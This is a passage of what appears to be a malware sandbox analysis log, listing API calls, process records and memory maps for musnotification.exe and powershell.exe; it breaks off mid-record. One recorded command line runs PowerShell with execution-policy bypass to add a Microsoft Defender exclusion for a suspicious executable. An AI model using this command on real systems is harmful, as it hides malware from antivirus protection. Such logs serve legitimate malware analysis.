1 [0347.464] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ac720) returned 1 [0347.464] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ac960) returned 1 [0347.464] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5acc00) returned 1 [0347.464] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5acc30) returned 1 [0347.464] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5acba0) returned 1 [0347.465] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ac810) returned 1 [0347.465] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5acff0) returned 1 [0347.465] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ac990) returned 1 [0347.465] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ad230) returned 1 [0347.465] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5acf60) returned 1 [0347.465] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ac780) returned 1 [0347.465] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5ac6c0) returned 1 [0347.466] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b6ad0) returned 1 [0347.466] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x55d8b0) returned 1 [0347.466] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5bd610) returned 1 [0347.468] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5b2090) returned 1 [0347.468] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x576c60) returned 1 [0347.468] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x585b20) returned 1 [0347.468] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5765e0) returned 1 Thread: id = 261 os_tid = 0xfb8 Thread: id = 262 os_tid = 0x984 Process: id = "12" image_name = "musnotification.exe" filename = "c:\\windows\\system32\\musnotification.exe" page_root = "0x7c2ca000" os_pid = "0x147c" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x8" cmd_line = "C:\\Windows\\system32\\MusNotification.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "S-1-5-80-2949785411-1458004381-4011503523-1439849274-3428788682" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "S-1-5-80-1139522462-2689595747-457373284-4037083511-4201549542" [0xa], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xe], "S-1-5-80-3577588319-513283748-931039988-2701962192-2148388740" [0xa], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bdae" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2988 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2989 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2990 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2991 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2992 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2993 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2994 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2995 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 2996 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 2997 start_va = 0x7ff62d2a0000 end_va = 0x7ff62d33afff monitored = 0 entry_point = 0x7ff62d300830 region_type = mapped_file name = "musnotification.exe" filename = "\\Windows\\System32\\MusNotification.exe" (normalized: "c:\\windows\\system32\\musnotification.exe") Region: id = 2998 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3030 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 3031 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 3032 start_va = 0x400000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3033 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3034 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3035 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3036 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 3037 start_va = 0xf0000 end_va = 0x1b8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3038 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3039 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3040 start_va = 0x480000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 3041 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3231 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3232 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3233 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3234 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3235 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 3236 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3237 start_va = 0x7fffca500000 end_va = 0x7fffca55ffff monitored = 0 entry_point = 0x7fffca510380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3238 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3239 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3240 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3241 start_va = 0x7fffc9f30000 end_va = 0x7fffc9f7afff monitored = 0 entry_point = 0x7fffc9f33480 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3242 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3243 start_va = 0x7fffc9f10000 end_va = 0x7fffc9f21fff monitored = 0 entry_point = 0x7fffc9f13e30 region_type = mapped_file name = "umpdc.dll" filename = "\\Windows\\System32\\umpdc.dll" (normalized: "c:\\windows\\system32\\umpdc.dll") Region: id = 3244 start_va = 0x7fffba0f0000 end_va = 0x7fffba19efff monitored = 0 entry_point = 0x7fffba15f1c0 region_type = mapped_file name = "upshared.dll" filename = "\\Windows\\System32\\upshared.dll" (normalized: "c:\\windows\\system32\\upshared.dll") Region: id = 3245 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3246 start_va = 0x7fffbe720000 end_va = 0x7fffbe756fff monitored = 0 entry_point = 0x7fffbe73ff00 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 3247 start_va = 0x7fffbfed0000 end_va = 0x7fffbffd1fff monitored = 0 entry_point = 0x7fffbff157d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3248 start_va = 0x7fffc9270000 end_va = 0x7fffc9279fff monitored = 0 entry_point = 0x7fffc9271850 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 3395 start_va = 0x7fffca0b0000 end_va = 0x7fffca0cefff monitored = 0 entry_point = 0x7fffca0b8ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3396 start_va = 0x7fffc37f0000 end_va = 0x7fffc3818fff monitored = 0 entry_point = 0x7fffc37f9320 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 3397 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3398 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3399 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 3400 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3401 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3402 start_va = 0x680000 end_va = 0x7a7fff monitored = 0 entry_point = 0x6a6140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3403 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3446 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3447 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3448 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 3449 start_va = 0x580000 end_va = 0x597fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3450 start_va = 0x5a0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 3451 start_va = 0x680000 end_va = 0x7c4fff monitored = 0 entry_point = 0x6da9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3452 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3453 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 3454 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3455 start_va = 0x630000 end_va = 0x630fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 3456 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3457 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 3458 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3459 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 3460 start_va = 0x640000 end_va = 0x647fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 3461 start_va = 0x680000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 3462 start_va = 0x880000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 3463 start_va = 0xa10000 end_va = 0xad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 3464 start_va = 0xae0000 end_va = 0xc24fff monitored = 0 entry_point = 0xb3a9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3465 start_va = 0xae0000 end_va = 0xb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 3495 start_va = 0xb60000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 3496 start_va = 0xbe0000 end_va = 0xc5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 3497 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 3498 start_va = 0x660000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 3499 start_va = 0x7fffc3560000 end_va = 0x7fffc3585fff monitored = 0 entry_point = 0x7fffc356ab40 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 3539 start_va = 0x7fffbadd0000 end_va = 0x7fffbae0efff monitored = 0 entry_point = 0x7fffbadf7d00 region_type = mapped_file name = "wosc.dll" filename = "\\Windows\\System32\\wosc.dll" (normalized: "c:\\windows\\system32\\wosc.dll") Region: id = 3607 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3608 start_va = 0x7fffbe450000 end_va = 0x7fffbe534fff monitored = 0 entry_point = 0x7fffbe4dac50 region_type = mapped_file name = "flightsettings.dll" filename = "\\Windows\\System32\\FlightSettings.dll" (normalized: "c:\\windows\\system32\\flightsettings.dll") Region: id = 3609 start_va = 0x7fffbad10000 end_va = 0x7fffbadc7fff monitored = 0 entry_point = 0x7fffbad1d870 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 3610 start_va = 0x7fffbf980000 end_va = 0x7fffbf98ffff monitored = 0 entry_point = 0x7fffbf9815e0 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4040 start_va = 0x7fffc6f30000 end_va = 0x7fffc7085fff monitored = 0 entry_point = 0x7fffc6f5b240 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 4064 start_va = 0x7fffc9590000 end_va = 0x7fffc95cafff monitored = 0 entry_point = 0x7fffc959a620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4065 start_va = 0x7fffcb790000 end_va = 0x7fffcb798fff monitored = 0 entry_point = 0x7fffcb792020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4074 start_va = 0x7fffb1820000 end_va = 0x7fffb1830fff monitored = 0 entry_point = 0x7fffb1826910 region_type = mapped_file name = "dusmapi.dll" filename = "\\Windows\\System32\\dusmapi.dll" (normalized: "c:\\windows\\system32\\dusmapi.dll") Region: id = 4075 start_va = 0x7fffc35f0000 end_va = 0x7fffc3682fff monitored = 0 entry_point = 0x7fffc35f9e10 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 4076 start_va = 0x7fffc92d0000 end_va = 0x7fffc9359fff monitored = 0 entry_point = 0x7fffc9315870 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 4077 start_va = 0x7fffbe760000 end_va = 0x7fffbe822fff monitored = 0 entry_point = 0x7fffbe76e000 region_type = mapped_file name = "windows.web.dll" filename = "\\Windows\\System32\\Windows.Web.dll" (normalized: "c:\\windows\\system32\\windows.web.dll") Region: id = 4078 start_va = 0x7fffc1960000 end_va = 0x7fffc1c0dfff monitored = 0 entry_point = 0x7fffc19969a0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4079 start_va = 0xc60000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 4221 start_va = 0x7fffc6740000 end_va = 0x7fffc6753fff monitored = 0 entry_point = 0x7fffc67428c0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4222 start_va = 0x7fffc9ad0000 end_va = 0x7fffc9b29fff monitored = 0 entry_point = 0x7fffc9adb770 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4223 start_va = 0x7fffca060000 end_va = 0x7fffca090fff monitored = 0 entry_point = 0x7fffca06e380 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4549 start_va = 0xd60000 end_va = 0xd61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Thread: id = 270 os_tid = 0x1230 Thread: id = 280 os_tid = 0x444 Thread: id = 300 os_tid = 0x1020 Thread: id = 301 os_tid = 0x101c Thread: id = 302 os_tid = 0x6c0 Thread: id = 305 os_tid = 0x1084 Process: id = "13" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x43a33000" os_pid = "0x1188" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1518" cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LIVE-WindowsPlayer-version-492b7f0827474659.exe'" cur_dir = "C:\\Users\\OqXZRaykm\\Desktop\\" os_username = "PXTHFFRYO7\\OqXZRaykm" bitness = "32" os_groups = "PXTHFFRYO7\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001bd08" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3146 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3147 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3148 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3149 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3150 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3151 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3152 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3153 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3154 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 3155 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 3156 start_va = 0x7ff733240000 end_va = 0x7ff7332b0fff monitored = 0 entry_point = 0x7ff733243d40 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 3157 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3158 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 3159 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 3160 start_va = 0x400000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3161 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3162 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3163 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3164 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 3165 start_va = 0x100000 end_va = 0x1c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 